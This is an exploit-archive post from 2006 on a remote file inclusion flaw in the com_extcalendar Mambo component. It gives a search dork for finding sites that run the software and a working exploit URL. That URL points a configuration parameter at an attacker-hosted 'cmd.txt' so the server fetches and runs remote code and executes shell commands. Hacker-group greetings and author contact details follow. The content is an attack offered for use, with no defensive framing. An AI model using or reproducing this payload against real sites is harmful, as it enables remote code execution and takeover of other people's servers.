com_extcalendar Mambo Component <= 2.0 Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : com_extcalendar Mambo Component <= 2.0 Include Vulnerability
# Published : 2006-07-17
# Author : OLiBekaS
# Previous Title : SMF Forum Mambo Component <= 1.3.1.3 Include Vulnerability
# Next Title : pc_cookbook Mambo Component <= 0.3 Include Vulnerability

--------------------------------------------------------------------------------
Title : ExtCalendar Mambo Module <= v2 Remote File Include Vulnerabilities
###############################################################################

Discovered By OLiBekaS
-----------------------------------------------------------------------------

dork        : "powered by ExtCalendar v2"
Exploit     :  
http://[target]/[path]/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://[attacker]/cmd.txt?&cmd=ls         
               
-----------------------------------------------------------------------------

greatz:
~~~~~
# Special greetz to my master effex and bEdAh`oTaK ( thank man )
# To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy. and other

-------------------------------------------------------------------------------

Contact:
~~~~~~~

Nick: OLiBekaS
E-mail: olibekas[at]gmail[dot]Com
Homepage: http://bekas.6te.net

--------------------------------- [ eof ] ---------------------------------------

# www.Syue.com [2006-07-17]